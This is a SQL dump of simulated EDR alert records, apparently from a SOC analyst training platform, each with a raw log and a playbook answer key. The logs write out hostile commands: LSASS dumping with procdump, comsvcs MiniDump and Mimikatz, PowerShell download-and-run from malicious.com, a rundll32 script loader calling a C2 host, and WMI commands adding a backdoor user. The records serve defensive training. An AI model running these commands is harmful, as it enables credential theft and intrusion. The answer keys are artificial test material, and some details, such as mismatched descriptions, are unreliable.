(2134, 'Credential Dumping via LSASS Detected', 'high', 'Carbon Black', 'Suspicious access to LSASS memory detected indicative of credential dumping. The attacker used procdump.exe to extract credentials.', 'Credential Attack', 'T1003.001', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:20:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.1.1.15\",\"dst_ip\":\"none\",\"username\":\"jdoe\",\"hostname\":\"workstation02.internal\",\"command_line\":\"procdump.exe -accepteula -ma lsass.exe dumpfile.dmp\",\"file_hash\":\"f2b1d9e8c9a6b8c4e2f1d3a9e8f4b7c6\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"procdump.exe -accepteula -ma lsass.exe dumpfile.dmp\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command used for credential dumping from LSASS.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"f2b1d9e8c9a6b8c4e2f1d3a9e8f4b7c6\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malicious procdump usage.\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The use of procdump.exe against LSASS and the associated hash confirm credential dumping activity.\"}', 'Expert', 'EDR', 9, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2135, 'Lateral Movement Detected via WMI', 'critical', 'SentinelOne', 'Detected lateral movement attempt using WMI to execute commands on a remote host. The attacker leveraged a compromised admin account.', 'Lateral Movement', 'T1047', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:15:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.2.2.14\",\"dst_ip\":\"10.2.2.20\",\"username\":\"admin_compromised\",\"hostname\":\"client01.internal\",\"command_line\":\"wmic /node:10.2.2.20 process call create \'cmd.exe /c whoami\'\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.2.2.20\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Destination IP is an internal asset.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"wmic /node:10.2.2.20 process call create \'cmd.exe /c whoami\'\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Use of WMI for remote command execution detected.\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\",\"block_ip\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The WMI command for remote execution and compromised admin account indicate an active lateral movement attempt.\"}', 'Expert', 'EDR', 9, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2136, 'DGA Domain Activity Detected', 'high', 'Sysmon', 'Communication with a dynamically generated domain pattern observed, indicative of a botnet or malware C2 using fast-flux technique.', 'Malware', 'T1568.002', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T13:54:10Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.45\",\"dst_ip\":\"203.0.113.57\",\"username\":\"malware_user\",\"hostname\":\"infected_pc.internal\",\"domain\":\"xj12kl3r9df.xyz\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"domain\",\"value\":\"xj12kl3r9df.xyz\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain associated with malware C2 using DGA.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.57\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported multiple times for fast-flux activity.\"}}],\"expected_actions\":[\"block_ip\",\"block_domain\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The DGA domain and fast-flux IP indicate sophisticated malware C2 activity.\"}', 'Expert', 'EDR', 9, 1, 'ENERGY', NULL, NULL, NULL, 0),
(2137, 'Memory-Only Payload Detected via Process Hollowing', 'critical', 'CrowdStrike', 'A memory-only payload was executed on an endpoint using process hollowing. The malware initiates multi-hop C2 communications.', 'Malware', 'T1055.012', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T16:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.10.50\",\"dst_ip\":\"198.51.100.45\",\"username\":\"user123\",\"hostname\":\"desktop03.internal\",\"command_line\":\"rundll32.exe hollowed.dll,EntryPoint\",\"file_hash\":\"a2c5b7e9f8e4d3c2b1f6d9a8b3c4e7f5\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in multi-hop C2 communication patterns.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"rundll32.exe hollowed.dll,EntryPoint\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Process hollowing technique detected.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a2c5b7e9f8e4d3c2b1f6d9a8b3c4e7f5\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches with known memory-only payload.\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of process hollowing and communication with a known malicious IP confirm the presence of advanced memory-only malware.\"}', 'Expert', 'EDR', 9, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2138, 'APT-Level PowerShell Fileless Malware Detected', 'critical', 'CrowdStrike', 'A fileless malware attack was detected using PowerShell to execute malicious scripts from memory. The attack involved credential dumping from LSASS.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:23:10Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"hostname\":\"host001\",\"command_line\":\"powershell -nop -w hidden -ep bypass -c \\\"IEX(New-Object Net.WebClient).DownloadString(\'http://malicious.com/ps.ps1\')\\\"\",\"file_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell -nop -w hidden -ep bypass -c \\\"IEX(New-Object Net.WebClient).DownloadString(\'http://malicious.com/ps.ps1\')\\\"\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"PowerShell script used for fileless malware delivery\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 1024 times for hosting malicious content\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with PowerShell-based malware\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of PowerShell indicates a fileless attack aimed at avoiding detection by traditional antivirus solutions.\"}', 'Expert', 'EDR', 9, 1, 'TECH', NULL, NULL, NULL, 0),
(2139, 'Credential Dumping via LSASS Detected', 'high', 'Carbon Black', 'A sophisticated attack attempt was identified where credentials were dumped from the LSASS process using a known tool.', 'Credential Attack', 'T1003', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:45:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.5\",\"username\":\"alice\",\"hostname\":\"server02\",\"command_line\":\"procdump.exe -accepteula -ma lsass.exe lsass.dmp\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"procdump.exe -accepteula -ma lsass.exe lsass.dmp\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Procdump used for unauthorized credential access\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"lsass.dmp\",\"is_critical\":false,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"Memory dump of LSASS process containing sensitive credentials\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The use of Procdump to access LSASS memory is a known technique for extracting credentials.\"}', 'Expert', 'EDR', 9, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2140, 'Lateral Movement Detected via WMI', 'critical', 'SentinelOne', 'An attacker leveraged WMI for lateral movement within the network, targeting multiple internal hosts.', 'Lateral Movement', 'T1047', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:30:15Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.0.15\",\"dst_ip\":\"10.0.0.25\",\"username\":\"bsmith\",\"hostname\":\"workstation01\",\"command_line\":\"wmic /node:10.0.0.25 process call create \\\"powershell -nop -w hidden -ep bypass -c Invoke-Mimikatz\\\"\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"wmic /node:10.0.0.25 process call create \\\"powershell -nop -w hidden -ep bypass -c Invoke-Mimikatz\\\"\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"WMI used for remote code execution and credential harvesting\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Source IP of compromised machine within the internal network\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Target IP of the lateral movement attempt\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of WMI indicates an advanced persistence and lateral movement strategy.\"}', 'Expert', 'EDR', 9, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2141, 'Fast-Flux DNS Detected in Malicious Activity', 'high', 'Sysmon', 'DNS queries for known fast-flux domains associated with C2 communications were detected.', 'Data Exfil', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:10:50Z\",\"event_type\":\"dns_query\",\"src_ip\":\"10.0.0.20\",\"domain\":\"suspect-domain.xyz\",\"hostname\":\"desktop01\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"domain\",\"value\":\"suspect-domain.xyz\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain associated with fast-flux networks used for data exfiltration\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP of the system querying the malicious domain\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_domain\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Fast-flux domains are often used for evasive C2 communications in data exfiltration campaigns.\"}', 'Expert', 'EDR', 9, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2142, 'Subtle Indicators of Memory-Only Payload Detected', 'critical', 'CrowdStrike', 'Heavy obfuscation and memory-only payloads were detected, indicating an advanced persistent threat using legitimate services for C2.', 'Malware', 'T1055', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T16:05:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"104.21.45.78\",\"username\":\"cmiller\",\"hostname\":\"laptop03\",\"command_line\":\"rundll32.exe javascript:\\\"\\\\..\\\\mshtml,RunHTMLApplication \\\";document.write(\'<script src=http://legit-service.com/c2.js></script>\');\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"rundll32.exe javascript:\\\"\\\\..\\\\mshtml,RunHTMLApplication \\\";document.write(\'<script src=http://legit-service.com/c2.js></script>\');\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Obfuscated command using rundll32 for memory-only payload execution\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"104.21.45.78\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP linked to C2 communications via legitimate service abuse\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of legitimate services for command and control indicates an attempt to blend in with normal traffic.\"}', 'Expert', 'EDR', 9, 1, 'ENERGY', NULL, NULL, NULL, 0),
(2143, 'Fileless Malware Detected via PowerShell Script Execution', 'critical', 'CrowdStrike', 'A sophisticated PowerShell script was executed, utilizing obfuscation techniques to evade detection. This script is associated with a fileless malware campaign targeting credential dumping.', 'Malware', 'T1059.001', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T03:45:12Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"192.168.1.5\",\"username\":\"jdoe\",\"hostname\":\"DESKTOP-01\",\"command_line\":\"powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand aGVsbG8gd29ybGQ=\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand aGVsbG8gd29ybGQ=\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"PowerShell command linked to fileless malware activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address associated with victim machine\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of encoded PowerShell commands is indicative of fileless malware, warranting a true positive classification.\"}', 'Expert', 'EDR', 9, 1, 'FINANCE', NULL, NULL, NULL, 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(2144, 'Credential Dumping Detected from LSASS Memory', 'high', 'SentinelOne', 'A process attempted to access LSASS memory to extract credentials using advanced techniques. The process was associated with known malware.', 'Credential Attack', 'T1003.001', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T06:22:34Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.10.15\",\"dst_ip\":\"192.168.10.20\",\"username\":\"admin\",\"hostname\":\"SERVER-02\",\"command_line\":\"mimikatz.exe privilege::debug sekurlsa::logonpasswords\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"mimikatz.exe privilege::debug sekurlsa::logonpasswords\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Mimikatz used for credential dumping, reported in multiple incidents\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.10.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address associated with attacker machine\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The process execution with Mimikatz indicates a credential dumping attempt, confirming the alert as a true positive.\"}', 'Expert', 'EDR', 9, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2145, 'Lateral Movement Detected via WMI', 'high', 'Carbon Black', 'Anomalous WMI activity detected, indicating potential lateral movement within the network. The attacker is leveraging WMI to execute processes on remote hosts.', 'Lateral Movement', 'T1047', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T04:50:47Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.20.30\",\"dst_ip\":\"192.168.20.40\",\"username\":\"svc_account\",\"hostname\":\"WORKSTATION-03\",\"command_line\":\"wmic /node:192.168.20.40 process call create \\\"cmd.exe /c tasklist\\\"\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"wmic /node:192.168.20.40 process call create \\\"cmd.exe /c tasklist\\\"\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"WMI command detected in lateral movement scenarios\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.20.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address involved in lateral movement\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of WMI for remote process execution is a known lateral movement tactic, validating the alert as a true positive.\"}', 'Expert', 'EDR', 9, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2146, 'Multi-hop C2 Communication via Discord Detected', 'critical', 'Sysmon', 'Detected multi-hop command and control communication utilizing Discord as the intermediary. This technique is used to obfuscate traffic and evade detection.', 'C2 Communication', 'T1071.001', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:15:53Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.30.45\",\"dst_ip\":\"162.159.137.54\",\"username\":\"user123\",\"hostname\":\"LAPTOP-04\",\"command_line\":\"discord.exe --remote-debugging-port=9222\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"162.159.137.54\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"IP associated with known C2 infrastructure, detected in multiple campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"discord.exe --remote-debugging-port=9222\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command line indicative of abuse for C2 communication via Discord\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of Discord for C2 communication, combined with known malicious IPs, confirms the alert as a true positive.\"}', 'Expert', 'EDR', 9, 1, 'TECH', NULL, NULL, NULL, 0),
(2147, 'Fast-flux DNS Detected for DGA Domain', 'high', 'CrowdStrike', 'A domain generated algorithmically (DGA) is using fast-flux DNS techniques, indicating potential malware activity. This method is used for evading detection by frequently changing IP addresses.', 'Malware', 'T1568.002', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:30:28Z\",\"event_type\":\"dns_request\",\"src_ip\":\"192.168.40.50\",\"dst_ip\":\"198.51.100.76\",\"username\":\"it_admin\",\"hostname\":\"SERVER-05\",\"request_body\":\"xy1z2abc3d4ef.example.com\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"domain\",\"value\":\"xy1z2abc3d4ef.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"DGA domain associated with known malware campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.76\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP involved in fast-flux DNS activity\"}}],\"expected_actions\":[\"block_ip\",\"block_domain\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The detection of a DGA domain with fast-flux DNS is a strong indicator of malicious activity, justifying the true positive verdict.\"}', 'Expert', 'EDR', 9, 1, 'ENERGY', NULL, NULL, NULL, 0),
(2148, 'Fileless Malware Detected via PowerShell Script Execution', 'critical', 'CrowdStrike', 'A PowerShell script executed a fileless malware payload targeting LSASS for credential dumping. The attack originated from an external IP using a sophisticated obfuscation technique.', 'Malware', 'T1059.001', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T02:30:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"192.168.1.25\",\"username\":\"jdoe\",\"hostname\":\"CORP-WORKSTATION-17\",\"command_line\":\"powershell -nop -w hidden -enc aQBmACgAIAAoACQAbgB1AGwAbAAgACkAIHsAIAAkAG4AdQBsAGwAIA0K\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 1523 times for malware distribution\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell -nop -w hidden -enc aQBmACgAIAAoACQAbgB1AGwAbAAgACkAIHsAIAAkAG4AdQBsAGwAIA0K\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Detected obfuscated PowerShell command typical of fileless malware\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of obfuscated PowerShell commands and targeting LSASS for credential dumping confirms this as a true positive.\"}', 'Expert', 'EDR', 9, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2149, 'Credential Dumping via LSASS Memory Access', 'high', 'Carbon Black', 'A process was detected accessing LSASS memory, typical of credential dumping attempts. The attacker used process hollowing techniques to evade detection.', 'Credential Attack', 'T1003.001', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T05:47:12Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.89\",\"dst_ip\":\"10.0.0.45\",\"username\":\"admin\",\"hostname\":\"CORP-SERVER-02\",\"command_line\":\"rundll32.exe C:\\\\Windows\\\\System32\\\\comsvcs.dll, MiniDump 1234 C:\\\\Temp\\\\lsass.dmp\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.89\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP associated with credential theft campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"rundll32.exe C:\\\\Windows\\\\System32\\\\comsvcs.dll, MiniDump 1234 C:\\\\Temp\\\\lsass.dmp\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command line indicates LSASS memory dumping\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The access to LSASS memory using process hollowing techniques signifies a true positive for credential dumping.\"}', 'Expert', 'EDR', 9, 1, 'TECH', NULL, NULL, NULL, 0),
(2150, 'Lateral Movement Detected via WMI Execution', 'critical', 'SentinelOne', 'An attacker used WMI to execute a remote command on a critical server, indicating lateral movement within the network. The attack involved DGA domains and fast-flux DNS.', 'Lateral Movement', 'T1047', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T07:22:39Z\",\"event_type\":\"process_execution\",\"src_ip\":\"198.51.100.45\",\"dst_ip\":\"192.168.2.30\",\"username\":\"svc_account\",\"hostname\":\"CORP-DBSERVER-04\",\"command_line\":\"wmic /node:192.168.2.30 process call create \\\"cmd.exe /c net user hacker P@ssw0rd /add\\\"\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP noted for involvement in lateral movement attacks\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"wmic /node:192.168.2.30 process call create \\\"cmd.exe /c net user hacker P@ssw0rd /add\\\"\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"WMI command execution indicative of lateral movement\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.2.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of WMI for remote command execution on an internal server confirms this as a lateral movement attempt.\"}', 'Expert', 'EDR', 9, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2151, 'Suspicious Network Activity with Fast-Flux DNS and DGA Domains', 'high', 'Sysmon', 'Detected network connections to domains generated by a Domain Generation Algorithm (DGA) with fast-flux DNS techniques. This is indicative of a potential botnet C2 activity.', 'Data Exfiltration', 'T1071.004', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:15:22Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.3.40\",\"dst_ip\":\"203.0.113.123\",\"username\":\"bsmith\",\"hostname\":\"CORP-LAPTOP-29\",\"domain\":\"abcd1234.xyz\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.123\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"IP associated with fast-flux DNS and botnet C2 servers\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"abcd1234.xyz\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Domain generated by DGA, typical of botnet communications\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.3.40\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The presence of DGA and fast-flux DNS patterns suggests an ongoing data exfiltration attempt via a botnet.\"}', 'Expert', 'EDR', 9, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
